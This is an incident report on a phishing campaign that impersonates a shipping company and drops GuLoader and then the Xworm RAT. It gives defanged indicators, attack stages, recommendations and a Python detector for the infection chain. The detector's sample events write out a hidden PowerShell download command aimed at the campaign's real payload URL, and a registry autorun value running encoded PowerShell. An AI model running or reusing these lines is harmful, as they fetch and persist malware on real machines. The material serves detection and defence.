Full Report
AhnLab SEcurity intelligence Center (ASEC) recently identified the distribution of GuLoader malware via a phishing email impersonating a well-known international shipping company. The phishing email was obtained through the email honeypot operated by ASEC. The mail body instructs users to check their post-paid customs tax and demands that they open the attachment. Figure […]
Analysis Summary
# Incident Report: GuLoader & Xworm RAT Campaign via Shipping Impersonation
## Executive Summary
This incident involved a targeted phishing campaign impersonating an international shipping company to distribute GuLoader, which subsequently downloaded and executed the Xworm Remote Access Trojan (RAT). The attack leveraged obfuscated VBScript and PowerShell to achieve initial execution and persistence, leading to the remote compromise of victim systems. Response primarily focused on identifying the malware chain and cataloging indicators of compromise related to the final payload.
## Incident Details
- **Discovery Date:** Recently identified (by ASEC via honeypot)
- **Incident Date:** Not explicitly stated; presumably shortly before ASEC's identification.
- **Affected Organization:** Not disclosed (identified via ASEC's honeypot)
- **Sector:** General (Leveraging themes applicable across sectors)
- **Geography:** Not disclosed
## Timeline of Events
### Initial Access
- **Date/Time:** Unknown
- **Vector:** Phishing email impersonating a famous international shipping company, demanding users check post-paid customs tax.
- **Details:** The email contained an attachment designed to trick the user into execution.
### Lateral Movement
- **Details:** The attackers used the executed PowerShell script to download additional files and established persistence via a registry key. The final payload, Xworm RAT, provides remote control capability, so the potential for further internal network movement existed as soon as the RAT ran.
### Data Exfiltration/Impact
- **Details:** The final executed payload was Xworm RAT. The primary impact mechanism is therefore the establishment of remote administration, which enables subsequent data theft, espionage, or system destruction; no specific data loss was detailed in the summary.
### Detection & Response
- **How it was discovered:** Detected by the AhnLab SEcurity intelligence Center (ASEC) email honeypot.
- **Response actions taken:** Identification and analysis of the malware chain (VBScript → PowerShell → GuLoader → Xworm RAT) and cataloging of IOCs.
## Attack Methodology
- **Initial Access:** Phishing email with malicious attachment masquerading as a shipping notification regarding customs tax.
- **Persistence:** Creation of a registry key under `HKEY_CURRENT_USER\SOFTWARE\[Random Name]` (e.g., `PolySyndetic`) to ensure execution of the obfuscated PowerShell script upon system restart or user logon.
- **Privilege Escalation:** Not explicitly detailed; the chain relies on the user executing the attachment.
- **Defense Evasion:** Heavy obfuscation used within the VBScript controlling the execution of the PowerShell script.
- **Credential Access:** Not explicitly detailed in the initial stages, but expected behavior after Xworm RAT execution.
- **Discovery:** Not explicitly detailed, but standard for RAT operations.
- **Lateral Movement:** Not explicitly detailed, but Xworm RAT is capable of this.
- **Collection:** Likely performed post-Xworm RAT execution.
- **Exfiltration:** Likely performed post-Xworm RAT execution.
- **Impact:** Execution of Xworm RAT via process injection into `msiexec.exe`.
## Impact Assessment
- **Financial:** Not stated.
- **Data Breach:** Potential for significant data breach due to the deployment of a Remote Access Trojan (Xworm RAT).
- **Operational:** Potential for operational disruption due to system compromise and remote control by threat actors.
- **Reputational:** Potential reputational damage dependent on the targeted entities.
## Indicators of Compromise
- **Network indicators (Defanged):**
- `hxxps[:]//planachiever[.]au/admin-admin/Belejrers[.]fla`
- `hxxps[:]//planachiever[.]au/admin-admin/bPeMVYr142[.]bin`
- `tripplebanks[.]duckdns[.]org` (FQDN)
- **File indicators:**
- MD5: `0477406f83847d43a3b668cc1e75185f`
- MD5: `1ce8509eabe2a293376d9b70044922fd`
- MD5: `9c14df330dea5dfaab7a4303a3296779`
- MD5: `a501b4c09476b8f5ab505c6578bf9f9e`
- **Behavioral indicators:**
- VBScript launching obfuscated PowerShell.
- PowerShell script downloading secondary payloads.
- Registry key creation under `HKEY_CURRENT_USER\SOFTWARE\[Random Name]` for persistence.
- Process injection and execution of Xworm RAT via child process `msiexec.exe`.
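The behavioral and atomic indicators above can be turned into detection logic. The following is an added example, not code from ASEC or from the original report: it runs a few constructed Sysmon-style events (the field names `event_type`, `image`, `parent_image`, `command_line`, `target_object`, `details`, `query_name` and `md5` are assumptions modelling Sysmon Event IDs 1, 13 and 22 plus a generic file-hash record) against the report's IOCs and the four behavioral stages of the chain. The indicators stay defanged in the code, and observed values are defanged before comparison, so no live indicator is embedded in the detector. The registry rule also covers the `HKCU\Software` audit suggested in the recommendations.

```python
"""Detection logic for the GuLoader -> Xworm chain described in the report.

Added example, not ASEC's code.  Events are dicts modelling Sysmon Event ID 1
(process create), 13 (registry value set), 22 (DNS query) and a generic
file-hash record; field names and all sample events are constructed.
"""
import re

# Indicators of compromise from the report (kept defanged).
IOC_URLS = {
    "hxxps[:]//planachiever[.]au/admin-admin/Belejrers[.]fla",
    "hxxps[:]//planachiever[.]au/admin-admin/bPeMVYr142[.]bin",
}
IOC_FQDNS = {"tripplebanks[.]duckdns[.]org"}
IOC_MD5 = {
    "0477406f83847d43a3b668cc1e75185f",
    "1ce8509eabe2a293376d9b70044922fd",
    "9c14df330dea5dfaab7a4303a3296779",
    "a501b4c09476b8f5ab505c6578bf9f9e",
}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)
# HKCU\SOFTWARE\<random name>\...  (Sysmon writes HKCU as HKU\<SID>)
HKCU_SOFTWARE = re.compile(r"^(HKCU|HKEY_CURRENT_USER|HKU\\[^\\]+)\\SOFTWARE\\[^\\]+\\", re.I)
PS_IN_DATA = re.compile(r"powershell|pwsh|frombase64string", re.I)

# The stages that together make up the chain described in the report.
CHAIN_STAGES = {
    "script_host_spawns_powershell",
    "powershell_download",
    "hkcu_software_powershell_value",
    "powershell_spawns_msiexec",
}


def defang(value: str) -> str:
    """Rewrite a live URL or host name into the report's defanged form."""
    return value.replace("http", "hxxp").replace("://", "[:]//").replace(".", "[.]")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (rule, detail) findings for every event matching an indicator."""
    findings = []
    for ev in events:
        kind = ev["event_type"]
        if kind == "process_create":
            image, parent = basename(ev["image"]), basename(ev["parent_image"])
            cmd = ev.get("command_line", "")
            if parent in SCRIPT_HOSTS and image in POWERSHELL:
                findings.append(("script_host_spawns_powershell", f"{parent} -> {image}"))
            if image in POWERSHELL and DOWNLOAD_HINTS.search(cmd):
                findings.append(("powershell_download", cmd[:80]))
            for url in URL_RE.findall(cmd):
                if defang(url) in IOC_URLS:
                    findings.append(("ioc_url", defang(url)))
            if parent in POWERSHELL and image == "msiexec.exe":
                findings.append(("powershell_spawns_msiexec", f"{parent} -> {image}"))
        elif kind == "registry_set":
            target = ev["target_object"]
            if HKCU_SOFTWARE.match(target) and PS_IN_DATA.search(ev.get("details", "")):
                findings.append(("hkcu_software_powershell_value", target))
        elif kind == "dns_query":
            name = ev["query_name"].lower()
            if defang(name) in IOC_FQDNS:
                findings.append(("ioc_fqdn", name))
        elif kind == "file_hash":
            if ev["md5"].lower() in IOC_MD5:
                findings.append(("known_bad_hash", ev["md5"].lower()))
    return findings


def chain_detected(findings) -> bool:
    """True when every stage of VBScript -> PowerShell -> registry -> msiexec was seen."""
    return CHAIN_STAGES <= {rule for rule, _ in findings}


# Constructed sample telemetry for one host (not real log data).
SAMPLE_EVENTS = [
    {"event_type": "process_create", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'wscript.exe "C:\Users\u\Downloads\customs_tax.vbs"'},
    {"event_type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "powershell.exe -NoP -W Hidden -c \"(New-Object Net.WebClient)"
                     ".DownloadString('https://planachiever.au/admin-admin/Belejrers.fla')\""},
    {"event_type": "registry_set", "target_object": r"HKCU\SOFTWARE\PolySyndetic\Start",
     "details": "powershell -w hidden -enc <base64 blob>"},  # value name/data constructed
    {"event_type": "process_create", "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "msiexec.exe"},
    {"event_type": "dns_query", "image": r"C:\Windows\System32\msiexec.exe",
     "query_name": "tripplebanks.duckdns.org"},
    {"event_type": "file_hash", "path": r"C:\Users\u\AppData\Local\Temp\stage2.bin",
     "md5": "0477406F83847D43A3B668CC1E75185F"},
    # Benign interactive PowerShell: must produce no finding.
    {"event_type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS)
    for rule, detail in hits:
        print(f"{rule:32} {detail}")
    print("full chain:", chain_detected(hits))
```

The behavioral rules fire on parent/child relationships and registry data rather than on the hashes alone, so they still match when the attacker rotates files; the hash and URL rules are kept for the specific campaign. On real telemetry the same logic applies per host, with `chain_detected` used to raise severity once several stages are seen together.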
## Response Actions
- **Containment measures** (inferred from standard practice following detection): Identification of all files and processes associated with the GuLoader/Xworm chain on affected hosts.
- **Eradication steps** (inferred): Removal of suspicious registry keys, deletion of malicious files, termination of malicious processes.
- **Recovery actions** (inferred): Rebuilding or restoring systems if deeply compromised, and password resets for potentially harvested credentials.
## Lessons Learned
- **Key takeaways:** Multi-stage attacks relying on social engineering (phishing) remain highly effective, especially when embedded in a seemingly legitimate business context (shipping/customs). Heavily obfuscated scripts (VBScript/PowerShell) effectively bypass initial signature-based detection.
- **What could have been done better:** Endpoint detection and response (EDR) capabilities are needed to detect in-memory execution by GuLoader and the subsequent process injection into legitimate processes such as `msiexec.exe`.
## Recommendations
- Implement stricter controls on running PowerShell and VBScript from untrusted email attachments (e.g., application control whitelisting).
- Enhance email gateway scanning for highly obfuscated scripts and files commonly associated with popular downloaders like GuLoader.
- Regularly audit `HKCU\Software` keys for unexpected auto-run entries established by user-level processes.
- Train users to verify external shipping or customs claims through official channels rather than relying solely on unsolicited email links or attachments.